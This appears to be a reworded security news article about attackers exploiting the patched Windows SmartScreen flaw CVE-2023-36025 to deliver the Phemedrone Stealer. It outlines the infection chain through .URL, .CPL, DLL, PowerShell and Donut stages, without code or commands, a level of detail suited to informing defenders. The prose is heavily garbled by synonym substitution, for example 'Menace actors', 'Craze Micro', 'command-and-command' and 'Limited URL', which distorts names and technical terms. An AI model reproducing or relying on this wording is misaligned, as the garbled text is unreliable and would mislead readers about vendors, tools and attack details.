Menace actors have been noticed leveraging a now-patched security flaw in Microsoft Windows to deploy an open up-supply details stealer termed Phemedrone Stealer.
“Phemedrone targets web browsers and information from cryptocurrency wallets and messaging apps these types of as Telegram, Steam, and Discord,” Craze Micro scientists Peter Girnus, Aliakbar Zahravi, and Simon Zuckerbraun said.
“It also can take screenshots and gathers technique info about components, area, and working process specifics. The stolen data is then despatched to the attackers by means of Telegram or their command-and-command (C&C) server.”
The attacks leverage CVE-2023-36025 (CVSS score: 8.8), a security bypass vulnerability in Windows SmartScreen, that could be exploited by tricking a consumer into clicking on a specifically crafted Internet Shortcut (.URL) or a hyperlink pointing to an Internet Shortcut file.
The actively-exploited shortcoming was tackled by Microsoft as section of its November 2023 Patch Tuesday updates.
The infection process consists of the danger actor hosting destructive Internet Shortcut files on Discord or cloud services like FileTransfer.io, with the one-way links also masked working with URL shorteners such as Limited URL.
The execution of the booby-trapped .URL file makes it possible for it to connect to an actor-controlled server and execute a manage panel (.CPL) file in a way that circumvents Windows Defender SmartScreen by having edge of CVE-2023-36025.
“When the destructive .CPL file is executed by means of the Windows Command Panel course of action binary, it in turn phone calls rundll32.exe to execute the DLL,” the researchers stated. “This malicious DLL functions as a loader that then phone calls on Windows PowerShell to down load and execute the future phase of the attack, hosted on GitHub.”
The abide by-on payload is a PowerShell loader (“Information3.txt”) that acts as a launchpad for Donut, an open-source shellcode loader that decrypts and executes Phemedrone Stealer.
Composed in C#, Phemedrone Stealer is actively taken care of by its developers on GitHub and Telegram, facilitating the theft of sensitive details from compromised systems.
The improvement is as soon as once more a indicator that threat actors are getting significantly versatile and swiftly adapting their attack chains to capitalize on newly disclosed exploits and inflict most destruction.
“In spite of acquiring been patched, menace actors carry on to uncover ways to exploit CVE-2023-36025 and evade Windows Defender SmartScreen protections to infect users with a myriad of malware sorts, together with ransomware and stealers like Phemedrone Stealer,” the scientists said.
Discovered this post exciting? Abide by us on Twitter and LinkedIn to read through a lot more special material we write-up.
Some elements of this post are sourced from: